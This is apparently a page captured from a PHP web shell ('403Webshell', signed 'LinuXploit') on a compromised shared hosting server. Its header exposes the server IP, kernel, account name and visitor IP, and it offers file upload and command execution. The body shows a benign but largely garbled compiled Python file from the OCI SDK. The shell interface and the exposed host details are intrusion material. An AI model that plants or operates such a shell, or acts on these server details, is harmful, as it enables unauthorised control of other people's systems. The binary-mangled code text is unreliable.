403Webshell
Server IP : 162.144.4.212  /  Your IP : 216.73.216.108
Web Server : Apache
System : Linux gator2125.hostgator.com 5.14.0-162.23.1.9991722448259.nf.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 31 18:11:45 UTC 2024 x86_64
User : cozeellc ( 2980)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /lib/python3.9/site-packages/oci/devops/models/__pycache__/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /lib/python3.9/site-packages/oci/devops/models/__pycache__/update_trigger_details.cpython-39.pyc
a

���fA%�@s8ddlmZmZmZddlmZeGdd�de��ZdS)�)�formatted_flat_dict�
NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc@s�eZdZdZdd�Zedd��Zedd��Zej	dd��Zed	d
��Z
e
j	dd
��Z
edd
��Zej	dd
��Zedd��Zej	dd��Zedd��Z
e
j	dd��Z
edd��Zej	dd��Zdd�Zdd�Zdd�ZdS)�UpdateTriggerDetailsz(
    The information to be updated.
    cKsPddddddd�|_dddd	d
dd�|_d|_d|_d|_d|_d|_d|_dS)
a;
        Initializes a new UpdateTriggerDetails object with values from keyword arguments. This class has the following subclasses and if you are using this class as input
        to a service operations then you should favor using a subclass over the base class:

        * :class:`~oci.devops.models.UpdateBitbucketServerTriggerDetails`
        * :class:`~oci.devops.models.UpdateVbsTriggerDetails`
        * :class:`~oci.devops.models.UpdateGitlabServerTriggerDetails`
        * :class:`~oci.devops.models.UpdateDevopsCodeRepositoryTriggerDetails`
        * :class:`~oci.devops.models.UpdateGithubTriggerDetails`
        * :class:`~oci.devops.models.UpdateGitlabTriggerDetails`
        * :class:`~oci.devops.models.UpdateBitbucketCloudTriggerDetails`

        The following keyword arguments are supported (corresponding to the getters/setters of this class):

        :param display_name:
            The value to assign to the display_name property of this UpdateTriggerDetails.
        :type display_name: str

        :param description:
            The value to assign to the description property of this UpdateTriggerDetails.
        :type description: str

        :param trigger_source:
            The value to assign to the trigger_source property of this UpdateTriggerDetails.
        :type trigger_source: str

        :param actions:
            The value to assign to the actions property of this UpdateTriggerDetails.
        :type actions: list[oci.devops.models.TriggerAction]

        :param freeform_tags:
            The value to assign to the freeform_tags property of this UpdateTriggerDetails.
        :type freeform_tags: dict(str, str)

        :param defined_tags:
            The value to assign to the defined_tags property of this UpdateTriggerDetails.
        :type defined_tags: dict(str, dict(str, object))

        �strzlist[TriggerAction]zdict(str, str)zdict(str, dict(str, object)))�display_name�description�trigger_source�actions�
freeform_tags�defined_tagsZdisplayNamer	�
triggerSourcerZfreeformTagsZdefinedTagsN)Z
swagger_typesZ
attribute_map�
_display_name�_description�_trigger_source�_actions�_freeform_tags�
_defined_tags)�self�kwargs�r�L/usr/lib/python3.9/site-packages/oci/devops/models/update_trigger_details.py�__init__s()�
�	zUpdateTriggerDetails.__init__cCsd|d}|dkrdS|dkr dS|dkr,dS|dkr8d	S|d
krDdS|dkrPd
S|dkr\dSdSdS)z�
        Given the hash representation of a subtype of this class,
        use the info in the hash to return the class of the subtype.
        rZBITBUCKET_SERVERZ#UpdateBitbucketServerTriggerDetailsZVBSZUpdateVbsTriggerDetailsZ
GITLAB_SERVERZ UpdateGitlabServerTriggerDetailsZDEVOPS_CODE_REPOSITORYZ(UpdateDevopsCodeRepositoryTriggerDetailsZGITHUBZUpdateGithubTriggerDetailsZGITLABZUpdateGitlabTriggerDetailsZBITBUCKET_CLOUDZ"UpdateBitbucketCloudTriggerDetailsrNr)Zobject_dictionary�typerrr�get_subtypeSs z UpdateTriggerDetails.get_subtypecCs|jS)z�
        Gets the display_name of this UpdateTriggerDetails.
        Trigger display name. Avoid entering confidential information.


        :return: The display_name of this UpdateTriggerDetails.
        :rtype: str
        �r�rrrrrrs
z!UpdateTriggerDetails.display_namecCs
||_dS)z�
        Sets the display_name of this UpdateTriggerDetails.
        Trigger display name. Avoid entering confidential information.


        :param display_name: The display_name of this UpdateTriggerDetails.
        :type: str
        Nr)rrrrrr~s
cCs|jS)z�
        Gets the description of this UpdateTriggerDetails.
        Optional description about the trigger.


        :return: The description of this UpdateTriggerDetails.
        :rtype: str
        �rrrrrr	�s
z UpdateTriggerDetails.descriptioncCs
||_dS)z�
        Sets the description of this UpdateTriggerDetails.
        Optional description about the trigger.


        :param description: The description of this UpdateTriggerDetails.
        :type: str
        Nr)rr	rrrr	�s
cCs|jS)z�
        **[Required]** Gets the trigger_source of this UpdateTriggerDetails.
        Source of the trigger. Allowed values are, GITHUB and GITLAB.


        :return: The trigger_source of this UpdateTriggerDetails.
        :rtype: str
        �rrrrrr
�s
z#UpdateTriggerDetails.trigger_sourcecCs
||_dS)z�
        Sets the trigger_source of this UpdateTriggerDetails.
        Source of the trigger. Allowed values are, GITHUB and GITLAB.


        :param trigger_source: The trigger_source of this UpdateTriggerDetails.
        :type: str
        Nr)rr
rrrr
�s
cCs|jS)z�
        Gets the actions of this UpdateTriggerDetails.
        The list of actions that are to be performed for this trigger.


        :return: The actions of this UpdateTriggerDetails.
        :rtype: list[oci.devops.models.TriggerAction]
        �rrrrrr�s
zUpdateTriggerDetails.actionscCs
||_dS)a
        Sets the actions of this UpdateTriggerDetails.
        The list of actions that are to be performed for this trigger.


        :param actions: The actions of this UpdateTriggerDetails.
        :type: list[oci.devops.models.TriggerAction]
        Nr )rrrrrr�s
cCs|jS)a�
        Gets the freeform_tags of this UpdateTriggerDetails.
        Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.  See `Resource Tags`__. Example: `{"bar-key": "value"}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :return: The freeform_tags of this UpdateTriggerDetails.
        :rtype: dict(str, str)
        �rrrrrr�sz"UpdateTriggerDetails.freeform_tagscCs
||_dS)a�
        Sets the freeform_tags of this UpdateTriggerDetails.
        Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.  See `Resource Tags`__. Example: `{"bar-key": "value"}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :param freeform_tags: The freeform_tags of this UpdateTriggerDetails.
        :type: dict(str, str)
        Nr!)rrrrrr�scCs|jS)a�
        Gets the defined_tags of this UpdateTriggerDetails.
        Defined tags for this resource. Each key is predefined and scoped to a namespace. See `Resource Tags`__. Example: `{"foo-namespace": {"bar-key": "value"}}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :return: The defined_tags of this UpdateTriggerDetails.
        :rtype: dict(str, dict(str, object))
        �rrrrrr
�sz!UpdateTriggerDetails.defined_tagscCs
||_dS)a�
        Sets the defined_tags of this UpdateTriggerDetails.
        Defined tags for this resource. Each key is predefined and scoped to a namespace. See `Resource Tags`__. Example: `{"foo-namespace": {"bar-key": "value"}}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :param defined_tags: The defined_tags of this UpdateTriggerDetails.
        :type: dict(str, dict(str, object))
        Nr")rr
rrrr
�scCst|�S�N)rrrrr�__repr__
szUpdateTriggerDetails.__repr__cCs|durdS|j|jkS)NF)�__dict__�r�otherrrr�__eq__
szUpdateTriggerDetails.__eq__cCs
||kSr#rr&rrr�__ne__szUpdateTriggerDetails.__ne__N)�__name__�
__module__�__qualname__�__doc__r�staticmethodr�propertyr�setterr	r
rrr
r$r(r)rrrrrs>A
















rN)Zoci.utilrrrZoci.decoratorsr�objectrrrrr�<module>s

Youez - 2016 - github.com/yon3zu
LinuXploit